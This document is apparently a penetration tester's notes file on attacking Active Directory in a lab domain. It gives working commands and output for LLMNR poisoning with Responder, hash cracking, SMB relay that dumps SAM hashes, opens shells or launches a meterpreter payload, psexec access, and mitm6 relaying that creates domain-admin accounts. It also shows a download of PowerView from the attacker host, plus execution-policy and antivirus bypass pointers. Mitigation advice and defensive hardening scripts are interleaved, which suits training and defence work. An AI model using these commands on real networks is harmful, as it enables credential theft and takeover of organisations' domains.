
Domain Controller and Active Directory Tools.ctb

Domain Controller + Active Directory Techniques
USEFUL COMMANDS
Useful Article:
https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018edition-82259ab73aaa
Discover SMB Ports with Signing disabled (or not required)
sudo nmap --script=smb2-security-mode -p445 192.168.2.0/24 --open
Hashcat
Password cracking.
syntax:
hashcat -m [module number of hashtype] filetocrack.txt passwordlist.txt
trick:
to find it easier we can do for example:
hashcat --help | grep NTLM
└──╼ $hashcat --help | grep NTLM
   5500 | NetNTLMv1 / NetNTLMv1+ESS   | Network Protocols
   5600 | NetNTLMv2                   | Network Protocols
   1000 | NTLM                        | Operating System
There is also a collab tool for Google compute (super fast):
https://kalilinuxtutorials.com/colabcat/
hashcat -m 1000 -o pwned.txt -r OneRuleToRuleThemAll.rule hash1.txt /root/wordlists/SecLists/Passwords/Leaked-Databases/*.txt
Wordlists
Here we have a huge amount of wordlists that can be used with hashcat:
https://github.com/danielmiessler/SecLists
Responder
This is part of the impacket toolkit.
This one works pretty well to capture NTLM Hashes.
sudo responder -I eth0 -rdwv
If you want to use it with ntlmrelay, disable the following:
/etc/responder/Responder.conf
SMB off
HTTP off
• A good idea is to run it early in the morning or while people are at lunch. We need traffic on the network for this to work.
-------------------------------------------------------------------------------
ntlmrelay.py
This one relays to a server that has signing disabled or not required.
• SMB Signing must be disabled on the target machine
• Relayed user credentials must be admin on machine.
1) Start Responder
2) ntlmrelayx.py -tf targets.txt -smb2support (this one just dumps the hashes)
3) ntlmrelayx.py -tf targets.txt -smb2support -i (this one provides an interactive shell)
-------------------------------------------------------------------------------
psexec
To start a remote connection to a machine once we have valid credentials:
psexec.py domain/user:password@ipaddress
also there is a metasploit version (not so recommended)
-------------------------------------------------------------------------------
mitm6
This one is awesome since, besides capturing hashes, it can create a new user as a domain admin. It does everything through IPv6.
1) run mitm6 -d domain
2) ntlmrelayx.py -6 -t ldaps://domainipaddress -wh fakewpad.domain -l lootme
everything is going to be saved in the “lootme” directory.
-------------------------------------------------------------------------------
bloodhound-python
This is pretty useful once we have valid credentials on the system, since we can extract groups, users, privileges, etc. of the domain controller and AD.
example:
bloodhound-python -d marvel.local -u fcastle -p Password1 -gc hydra-dc.marvel.local -c all -ns 192.168.2.200
-------------------------------------------------------------------------------
One Liner downloads with PowerShell
Invoke-WebRequest "https://example.com/archive.zip" -OutFile "C:\Windows\Temp\archive.zip"
Diagram of the network to attack
Attack Vectors - LLMNR Poisoning
1) LLMNR Poisoning
LLMNR is link local multicast name resolution.
It is basically a fallback for DNS: it identifies hosts when DNS fails to do so.
Previously known as NBT-NS
The key flaw is that the service sends the user's username and NTLMv2 hash to whoever answers its query, so a spoofed response gets both.
Capturing NTLM Hashes with Responder
a) Make sure /etc/responder/Responder.conf has the following attributes set to “on”:
; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
b) Start Responder:
──╼ $sudo responder -I eth0 -rdwv
NBT-NS, LLMNR & MDNS Responder 3.0.0.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]
[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]
[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [192.168.2.51]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']
[+] Listening for events...
c) As soon as someone tries to open a share, Responder will capture the hashes:
PC1 (THEPUNISHER)
EVIL HACKER MACHINE
This is what we get on our attacker machine:
- We just captured the fcastle user's NTLMv2 hash. The output also shows the IP address of the victim machine and the username.
- We can proceed to crack this hash.
Cracking the Hash
For this we can use Hashcat. It is better to run it on a machine with a good graphics card rather than in a VM.
a) fcastle's hash is now saved in fcastle.txt file.
b) cracking it with hashcat:
└──╼ $sudo hashcat -m 5600 fcastle.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.1.1) starting...
FCASTLE::MARVEL:763d0f88b64d6524:f1f9cbcabb6f218e8e2a99a2b8e06427:0101000000000000c0653150de09d2016
Username = fcastle
Password = Password1
Mitigation:
The best defense in this case is to disable LLMNR and NBT-NS.
• To disable LLMNR, select “Turn OFF Multicast Name Resolution” under Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client, in the Group Policy Editor.
• To disable NBT-NS, navigate to Network Connections > Network Adapter Properties > TCP/IPv4 Properties > Advanced Tab > WINS tab and select “Disable NetBIOS over TCP/IP”
If a Company must use or cannot disable LLMNR/NBT-NS, the best course of action is to:
• Require Network Access Control
• Require Strong user passwords to avoid cracking the hashes.
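The two settings above can be audited and applied from PowerShell. This is an added example, not code from the original notes; it assumes an elevated session and uses the registry values those two GUI settings write (EnableMulticast under the DNSClient policy key, NetbiosOptions per NetBT interface).

```powershell
# Added example, not from the original notes: audit the two LLMNR-poisoning
# mitigations above (LLMNR off, NetBIOS over TCP/IP off) on a Windows host and,
# with -Remediate, apply them. Run in an elevated PowerShell session.
[CmdletBinding()]
param([switch]$Remediate)

# Value written by the "Turn OFF Multicast Name Resolution" policy (0 = LLMNR disabled).
$llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
# One subkey per interface; NetbiosOptions 0 = DHCP default, 1 = enabled, 2 = disabled.
$netbtIfaces = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'

function Get-LlmnrState {
    $v = Get-ItemProperty -Path $llmnrKey -Name EnableMulticast -ErrorAction SilentlyContinue
    if ($null -eq $v)             { return 'Enabled (policy not configured)' }
    if ($v.EnableMulticast -eq 0) { return 'Disabled' }
    return 'Enabled'
}

function Get-NetbiosState {
    Get-ChildItem -Path $netbtIfaces | ForEach-Object {
        $opt = (Get-ItemProperty -Path $_.PSPath -Name NetbiosOptions -ErrorAction SilentlyContinue).NetbiosOptions
        [pscustomobject]@{
            Interface      = $_.PSChildName
            NetbiosOptions = $opt
            State          = $(switch ($opt) { 2 { 'Disabled' } 1 { 'Enabled' } default { 'Default (DHCP / enabled)' } })
        }
    }
}

function Set-LlmnrNetbiosHardening {
    # Same effect as the Group Policy setting: create the policy key if missing, EnableMulticast = 0.
    if (-not (Test-Path $llmnrKey)) { New-Item -Path $llmnrKey -Force | Out-Null }
    Set-ItemProperty -Path $llmnrKey -Name EnableMulticast -Value 0 -Type DWord
    # Same effect as "Disable NetBIOS over TCP/IP" on the WINS tab, for every interface.
    Get-ChildItem -Path $netbtIfaces | ForEach-Object {
        Set-ItemProperty -Path $_.PSPath -Name NetbiosOptions -Value 2 -Type DWord
    }
}

"LLMNR: $(Get-LlmnrState)"
Get-NetbiosState | Format-Table -AutoSize

if ($Remediate) {
    Set-LlmnrNetbiosHardening
    'Applied. Re-run without -Remediate to verify; the NetBT change takes effect after an adapter reset or reboot.'
}
```

Responder's poisoner list above also includes mDNS, which these two settings do not cover.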
Attack Vectors - SMB Relay
2) SMB Relay
Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access.
Requirements
• SMB Signing must be disabled on the target machine
• Relayed user credentials must be admin on the target machine.
SMB signing is a packet-level protection: each SMB message is signed so the server can verify it really comes from the authenticated client. Signing is what says “you are not really that person, so I won't let you in”.
If it is disabled (or not required), the server does not check authenticity, so a relayed session is accepted.
For this, we need to turn off SMB and HTTP on /etc/responder/Responder.conf
This attack can dump sensitive information like SAM Hashes
SAM Hashes are like /etc/shadow in linux.
We can take the hashes and crack them or use another vector “Pass the Hash”
Attack Demonstration 1
1) Turn off SMB and HTTP in /etc/responder/Responder.conf
└──╼ $cat /etc/responder/Responder.conf
[Responder Core]
; Servers to start
SQL = On
SMB = Off
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
2) Discover hosts with SMB signing disabled (or not required):
└──╼ $sudo nmap --script=smb2-security-mode -p445 192.168.2.0/24 --open
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-25 14:11 CST
Nmap scan report for 192.168.2.200
Host is up (0.0011s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: AE:9F:69:8D:2E:1C (Unknown)
Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
Nmap scan report for 192.168.2.201
Host is up (0.0017s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 92:E9:84:60:FF:BA (Unknown)
Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
Nmap scan report for 192.168.2.202
Host is up (0.0011s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 62:E3:D6:C5:AD:B8 (Unknown)
Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
Nmap done: 256 IP addresses (11 hosts up) scanned in 8.24 seconds
In this example, servers 192.168.2.201 and .202 have SMB signing “enabled but not required”. This is the same as having it disabled, since the server accepts both signed and unsigned sessions.
3) Create a file, targets.txt, containing the targets 192.168.2.201 and 192.168.2.202.
4) Boot up Responder the same way we did before:
responder -I eth0 -rdwv
5) Start ntlmrelayx.py:
└──╼ $sudo sudo ntlmrelayx.py -tf targets.txt -smb2support
[sudo] password for marduk:
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning:
Python 2 is no longer supported by the Python core team. Support for it is now deprecated in
cryptography, and will be removed in a future release.
from cryptography import x509
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
6) Now we wait for someone to connect to an SMB share:
7) This is what we get on ntlmrelayx.py:
[*] SMBD-Thread-3: Connection from MARVEL/FCASTLE@192.168.2.201 controlled, attacking target smb://192.168.2.201
[-] Authenticating against smb://192.168.2.201 as MARVEL/FCASTLE FAILED
[*] SMBD-Thread-4: Connection from MARVEL/FCASTLE@192.168.2.201 controlled, attacking target smb://192.168.2.202
[*] Authenticating against smb://192.168.2.202 as MARVEL/FCASTLE SUCCEED
[*] SMBD-Thread-4: Connection from MARVEL/FCASTLE@192.168.2.201 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe2d0d1ee6b5099e79155664f8f7022fe
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:dcf8ac9223a8cf57291ed6abda2bc043:::
Dead Pool:1002:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0:::
[*] Done dumping SAM hashes for host: 192.168.2.202
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
We have the SAM hash for user “Dead Pool”. We can crack these hashes or move laterally with them (pass the hash).
Attack Demonstration 2
1) We start Responder the same way (always with HTTP and SMB turned off)
2) We run the same ntlmrelayx.py command, but this time we add “-i” at the end for an interactive session:
3) We wait for someone to connect to a share and see what happens:
ntlmrelayx.py -tf targets.txt -smb2support -i
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] SMBD-Thread-3: Connection from MARVEL/FCASTLE@192.168.2.201 controlled, attacking target smb://192.168.2.202
[*] Authenticating against smb://192.168.2.202 as MARVEL/FCASTLE SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[*] SMBD-Thread-3: Connection from MARVEL/FCASTLE@192.168.2.201 controlled, but there are no more targets left!
4) Now we can connect to it with netcat:
nc 127.0.0.1 11000
└──╼ $nc 127.0.0.1 11000
Type help for list of commands
# help
open {host,port=445} - opens a SMB connection against the target host/port
login {domain/username,passwd} - logs into the current SMB connection, no parameters for NULL connection. If no password specified, it'll be prompted
kerberos_login {domain/username,passwd} - logs into the current SMB connection using Kerberos. If no password specified, it'll be prompted. Use the DNS resolvable domain name
login_hash {domain/username,lmhash:nthash} - logs into the current SMB connection using the password hashes
logoff - logs off
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
lcd {path} - changes the current local directory to {path}
pwd - shows current remote directory
password - changes the user password, the new password will be prompted for input
ls {wildcard} - lists all the files in the current directory
rm {file} - removes the selected file
mkdir {dirname} - creates the directory under the current path
rmdir {dirname} - removes the directory under the current path
put (unknown) - uploads the filename into the current path
get (unknown) - downloads the filename from the current path
mount {target,path} - creates a mount point from {path} to {target} (admin required)
umount {path} - removes the mount point at {path} without deleting the directory (admin required)
list_snapshots {path} - lists the vss snapshots for the specified path
info - returns NetrServerInfo main results
who - returns the sessions currently connected at the target host (admin required)
close - closes the current SMB Session
exit - terminates the server process (and this session)
We have all those options, so basically we can upload, download, change the password of the local user, make directories, remove them, check the shares, etc.
5) Let's check the shares and navigate the system:
# shares
ADMIN$
C$
IPC$
pparkershare
# use C$
# ls
drw-rw-rw-          0  Thu Oct 22 03:47:35 2020 $Recycle.Bin
drw-rw-rw-          0  Wed Oct 21 00:48:56 2020 Documents and Settings
-rw-rw-rw-  858882048  Thu Oct 22 08:33:28 2020 hiberfil.sys
-rw-rw-rw- 1476395008  Thu Oct 22 08:33:33 2020 pagefile.sys
drw-rw-rw-          0  Wed Oct 21 01:21:18 2020 PerfLogs
drw-rw-rw-          0  Thu Oct 22 03:25:01 2020 pparkershare
drw-rw-rw-          0  Wed Oct 21 00:30:06 2020 Program Files
drw-rw-rw-          0  Wed Oct 21 01:21:18 2020 Program Files (x86)
drw-rw-rw-          0  Thu Oct 22 03:07:29 2020 ProgramData
drw-rw-rw-          0  Wed Oct 21 00:00:12 2020 Recovery
-rw-rw-rw-  268435456  Thu Oct 22 08:33:33 2020 swapfile.sys
drw-rw-rw-          0  Thu Oct 22 03:50:31 2020 System Volume Information
drw-rw-rw-          0  Thu Oct 22 03:46:55 2020 Users
drw-rw-rw-          0  Thu Oct 22 16:53:08 2020 Windows
... and we can do the same with all the shares.
Attack Demonstration 3
1) Same thing as before, we start responder, we start ntlmrelayx.py but this time with the following command:
ntlmrelayx.py -tf targets.txt -smb2support -e meterpreter.exe
This way we can start a meterpreter shell on the victim machine and then just set Metasploit to listen for the connection back with multi/handler.
2) Instead of -e we can use -c to specify a command to run on the server (reverse shells and so on).
SMB Relay Mitigations
• Enable SMB Signing on all devices
◇ Pro: Completely stops the attack
◇ Con: Can cause performance issues with file copies
• Disable NTLM Authentication on Network:
◇ Pro: Completely stops the attack
◇ Con: If Kerberos stops working, Windows defaults back to NTLM
• Account Tiering:
◇ Pro: Limits domain admins to specific tasks (e.g. only log onto servers with need for DA)
◇ Con: Enforcing the policy may be difficult
• Local Admin Restriction:
◇ Pro: Can Prevent a lot of lateral movement
◇ Con: Potential increase in the amount of service desk tickets
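The first two mitigations above can be checked on a host before a Group Policy rollout. This is an added example, not code from the original notes; it assumes an elevated session on Windows 8 / Server 2012 or later (SmbShare module) and reads the Lsa registry values the “Restrict NTLM” and LAN Manager authentication level policies set.

```powershell
# Added example, not from the original notes: report which of the SMB relay
# mitigations above are in place on a Windows host (SMB signing, NTLM
# restriction) and, with -Remediate, require SMB signing on both sides.
[CmdletBinding()]
param([switch]$Remediate)

function Get-SmbSigningPosture {
    $srv = Get-SmbServerConfiguration
    $cli = Get-SmbClientConfiguration
    [pscustomobject]@{
        ServerSigningEnabled  = $srv.EnableSecuritySignature
        # This is what nmap's smb2-security-mode reports as "required" vs "not required".
        ServerSigningRequired = $srv.RequireSecuritySignature
        ClientSigningRequired = $cli.RequireSecuritySignature
    }
}

function Get-NtlmPosture {
    # "Network security: Restrict NTLM" policies land under Lsa\MSV1_0 (2 = deny all).
    # LmCompatibilityLevel 5 = send NTLMv2 only, refuse LM and NTLM (defeats "Force LM downgrade").
    $msv = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0' -ErrorAction SilentlyContinue
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        RestrictReceivingNTLMTraffic = $msv.RestrictReceivingNTLMTraffic   # $null = not configured
        RestrictSendingNTLMTraffic   = $msv.RestrictSendingNTLMTraffic
        LmCompatibilityLevel         = $lsa.LmCompatibilityLevel
    }
}

function Test-SmbRelayMitigations {
    $s = Get-SmbSigningPosture
    $n = Get-NtlmPosture
    $findings = @()
    if (-not $s.ServerSigningRequired) {
        $findings += 'SMB server signing not required: shows as "enabled but not required" in nmap and accepts relayed sessions.'
    }
    if (-not $s.ClientSigningRequired) {
        $findings += 'SMB client signing not required on outgoing connections.'
    }
    if (-not $n.LmCompatibilityLevel -or $n.LmCompatibilityLevel -lt 5) {
        $findings += 'LmCompatibilityLevel below 5: LM/NTLMv1 responses can still be sent.'
    }
    if ($n.RestrictReceivingNTLMTraffic -ne 2) {
        $findings += 'Incoming NTLM not denied (RestrictReceivingNTLMTraffic != 2); relay still possible wherever signing is off.'
    }
    return $findings
}

$findings = Test-SmbRelayMitigations
if ($findings.Count -eq 0) { 'All SMB relay mitigations checked are in place.' }
else { $findings | ForEach-Object { "[!] $_" } }

if ($Remediate) {
    # "Enable SMB Signing on all devices": require it for the server and the client side.
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
    'SMB signing now required on this host. NTLM restriction is left to Group Policy (verify Kerberos first, see the con above).'
}
```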
Gaining Shell Access
What to do now that we have credentials?
If we have SMB open and some credentials, we can definitely get shells with psexec in Metasploit or the regular psexec.py.
1) Metasploit. Launch msfconsole:
msf5 > use exploit/windows/smb/psexec
msf5 > options
• Here we select the options for Rhosts, Rport, SMBDomain, SMBUser and SMBPass
• Once those are set, we set the payload: set payload windows/x64/meterpreter/reverse_tcp
• Setup the lhost options and lport and then run the exploit.
The downside is that most of the time this is caught by AV.
2) psexec:
└──╼ $sudo psexec.py marvel.local/fcastle:Password1@192.168.2.201
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 192.168.2.201.....
[*] Found writable share ADMIN$
[*] Uploading file CWcRFghr.exe
[*] Opening SVCManager on 192.168.2.201.....
[*] Creating service oPtO on 192.168.2.201.....
[*] Starting service oPtO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18363.418]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
It is better to try with psexec instead of the psexec option in metasploit. Most of the time this is not detected.
Some other alternatives would be wmiexec.py or smbexec.py (less noisy)
***** PSEXEC is noisy with AV.
IPV6 Attacks
IPV6 Attacks - DNS TakeOver Attack
Resources:
https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
In this example the attacker poses as the DNS server for IPv6.
The problem is that, when this happens, it can capture authentications to the domain controller via LDAP or SMB.
In this example, after a machine reboots it logs into the domain controller, and we can potentially use this attack to create a new machine account, new users, etc., and we get hashes. With this attack we also relay to LDAP to log in as the domain administrator and create an account with admin privileges.
The Attack
1) We boot mitm6:
mitm6 -d marvel.local
we will start getting replies from devices in our network. Then we send a relay attack:
2) ntlmrelayx.py (192.168.2.200 is the domain controller IP):
ntlmrelayx.py -6 -t ldaps://192.168.2.200 -wh fakewpad.marvel.local -l lootme
-6 : for ipv6
-t ldaps:// : To relay to ldap
-wh : to use a fake wpad
-l : which directory to save the loot.
└──╼ $sudo mitm6 -d marvel.local
/usr/lib/python2.7/dist-packages/scapy/config.py:384: CryptographyDeprecationWarning: Python 2
is no longer supported by the Python core team. Support for it is now deprecated in
cryptography, and will be removed in a future release.
import cryptography
Starting mitm6 using the following configuration:
Primary adapter: eth0 [00:0c:29:df:8c:70]
IPv4 address: 192.168.2.51
IPv6 address: fe80::532d:fcb0:7aff:4c9c
DNS local search domain: marvel.local
DNS whitelist: marvel.local
└──╼ $sudo ntlmrelayx.py -6 -t ldaps://192.168.2.200 -wh fakewpad.marvel.local -l lootme
[sudo] password for marduk:
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning:
Python 2 is no longer supported by the Python core team. Support for it is now deprecated in
cryptography, and will be removed in a future release.
from cryptography import x509
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] HTTPD: Received connection from ::ffff:192.168.2.202, attacking target ldaps://192.168.2.200
[*] HTTPD: Client requested path: /wpad.dat
3) We reboot one of the machines to speed up the process. Once it authenticates to the domain, everything is going to be saved in the “lootme” directory.
All that information provides more insight on users, groups, domain users, computers, etc. on that domain.
This is the output for domain_users_by_group.html:
4) With the same settings we currently have applied, if a domain admin logs into any machine we will have a new admin user created on the domain controller:
[*] User privileges found: Adding user to a privileged group (Enterprise Admins)
[*] User privileges found: Modifying domain ACL
[*] Attempting to create user in: CN=Users,DC=MARVEL,DC=local
[*] Adding new user with username: YLpYSwjGkx and password: Ey//0zC'xX#+ssm result: OK
[*] Adding new user with username: XcuwirENKY and password: ehR%DrH+766`XOt result: OK
[*] Querying domain security descriptor
[*] Querying domain security descriptor
[*] Success! User YLpYSwjGkx now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20201025-155400.restore
[-] New user already added. Refusing to add another
[-] Unable to escalate without a valid user, aborting.
[*] Success! User XcuwirENKY now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20201025-155401.restore
[-] New user already added. Refusing to add another
[-] Unable to escalate without a valid user, aborting.
As we can see, a new user has been created:
[*] Adding new user with username: YLpYSwjGkx and password: Ey//0zC'xX#+ssm result: OK
[*] Adding new user with username: XcuwirENKY and password: ehR%DrH+766`XOt result: OK
We can confirm this on the Domain Controller:
Notes
We can run mitm6 with the option --delegate-access. This can add a new computer account and impersonate users on that computer (delegate access / delegate impersonation attack).
Mitigation Strategies
1. IPv6 poisoning abuses the fact that Windows queries for an IPv6 address even in IPv4-only environments. If you don't use IPv6 internally, the safest way to prevent this mitm6 attack is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. Disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to block instead of allow prevents the attack from working:
◇ (inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)
◇ (inbound) Core Networking - Router Advertisement (ICMPv6-In)
◇ (outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPv6-Out)
2. If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHTTPAutoProxySvc service.
3. Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding.
4. Consider adding administrative users to the Protected Users group or marking them as “Account is sensitive and cannot be delegated”, which will prevent any impersonation of that user via delegation.
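The four mitigations above, checked and optionally applied from PowerShell. This is an added example, not code from the original notes; it assumes an elevated session, uses the firewall rule display names listed above, the NTDS\Parameters values LDAPServerIntegrity and LdapEnforceChannelBinding for step 3, and the ActiveDirectory RSAT module for step 4.

```powershell
# Added example, not from the original notes: check (and with -Remediate apply)
# the four mitm6 mitigations above. Steps 1-2 apply to any domain member and
# need an elevated session; step 3 is meaningful on a domain controller; step 4
# needs the ActiveDirectory RSAT module. Rule display names are those from the notes.
[CmdletBinding()]
param([switch]$Remediate)

# 1) Predefined firewall rules, set to Block instead of Allow (no need to disable IPv6).
$dhcpv6RuleNames = @(
    'Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)',
    'Core Networking - Router Advertisement (ICMPv6-In)',
    'Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPv6-Out)'
)
foreach ($name in $dhcpv6RuleNames) {
    $rule = Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue
    if ($null -eq $rule) { "[?] rule not found: $name"; continue }
    if ($Remediate) {
        $rule | Set-NetFirewallRule -Action Block -Enabled True
        $rule = Get-NetFirewallRule -DisplayName $name
    }
    $mark = if ($rule.Action -eq 'Block' -and $rule.Enabled -eq 'True') { 'OK' } else { '!!' }
    "[$mark] $name -> Action=$($rule.Action) Enabled=$($rule.Enabled)"
}

# 2) WPAD: the WinHTTP Web Proxy Auto-Discovery service. Start = 4 disables it even on
#    builds where services.msc greys the option out; the Group Policy side is separate.
$wpadSvc = 'HKLM:\SYSTEM\CurrentControlSet\Services\WinHttpAutoProxySvc'
if ($Remediate) {
    Set-ItemProperty -Path $wpadSvc -Name Start -Value 4 -Type DWord
    Stop-Service -Name WinHttpAutoProxySvc -Force -ErrorAction SilentlyContinue
}
$start = (Get-ItemProperty -Path $wpadSvc -Name Start).Start
$mark = if ($start -eq 4) { 'OK' } else { '!!' }
"[$mark] WinHttpAutoProxySvc Start=$start (4 = disabled)"

# 3) LDAP signing and channel binding on the DC (relay to ldap/ldaps needs both).
#    LDAPServerIntegrity 2 = require signing; LdapEnforceChannelBinding 2 = always.
$ntds = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters' -ErrorAction SilentlyContinue
if ($null -ne $ntds) {
    $mark = if ($ntds.LDAPServerIntegrity -eq 2) { 'OK' } else { '!!' }
    "[$mark] LDAPServerIntegrity=$($ntds.LDAPServerIntegrity) (2 = signing required)"
    $mark = if ($ntds.LdapEnforceChannelBinding -eq 2) { 'OK' } else { '!!' }
    "[$mark] LdapEnforceChannelBinding=$($ntds.LdapEnforceChannelBinding) (2 = always)"
} else { '[-] not a domain controller: LDAP signing / channel binding not checked here' }

# 4) Admin accounts that are neither in Protected Users nor marked
#    "Account is sensitive and cannot be delegated" remain open to delegation abuse.
if (Get-Module -ListAvailable -Name ActiveDirectory) {
    Import-Module ActiveDirectory
    $protected = @(Get-ADGroupMember -Identity 'Protected Users' -Recursive |
                   Select-Object -ExpandProperty distinguishedName)
    Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
        Where-Object objectClass -eq 'user' |
        ForEach-Object { Get-ADUser -Identity $_.distinguishedName -Properties AccountNotDelegated } |
        ForEach-Object {
            if ($_.DistinguishedName -notin $protected -and -not $_.AccountNotDelegated) {
                "[!!] $($_.SamAccountName): not in Protected Users and delegation not blocked"
            }
        }
} else { '[-] ActiveDirectory module not available: Protected Users check skipped' }
```

Registry changes in steps 2 and 3 are the local equivalents of the Group Policy settings; in a domain, apply them through GPO so they are not overwritten at the next refresh.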
Post Compromise Enumeration
For this we will be using Powerview and Bloodhound.
PowerView CheatSheet:
This is good for Domain Enumeration.
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
This is part of PowerShellMafia. Can be downloaded from:
https://github.com/PowerShellMafia/PowerSploit
Bloodhound
Bloodhound can be used to visualize the information and to find the shortest path to compromise.
To Install it :
a) apt install neo4j
b) sudo neo4j start
c) log into the server 127.0.0.1 and the port it provides. Change the password.
d) pip install bloodhound, pip3 install bloodhound.
PowerView Enumeration
Enumeration with PowerView
CheatSheet: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
This will be performed once we have access to one of the computers in the domain.
1) Once we are inside the target machine, we download powerview.ps1 onto it. I like doing it with a PowerShell one-liner:
Invoke-WebRequest "https://example.com/powerview.ps1" -OutFile "C:\Windows\Temp\powerview.ps1"
In my example the result would be:
Invoke-WebRequest "http://192.168.2.51:9090/powerview.ps1" -OutFile powerview.ps1
To bypass execution policy I use “powershell -ep bypass”
2) We call our program by doing: . .\PowerView.ps1
Sometimes it is possible that the AV blocks it.
This is a good article to bypass the AV:
https://www.cyberguider.com/bypassing-av-cat-vs-mouse/
In this case it works fine:
3) These are some of the commands that we can run:
- Get-NetDomain: Information about the domain: domain controllers, children, domain mode, level, parent, etc.
- Get-NetDomainController: Gives the IP of the domain controller, name, etc. (useful, for example, when an exploit asks for the IP of the domain controller)
- Get-DomainPolicy: This will show all the policies in the domain.
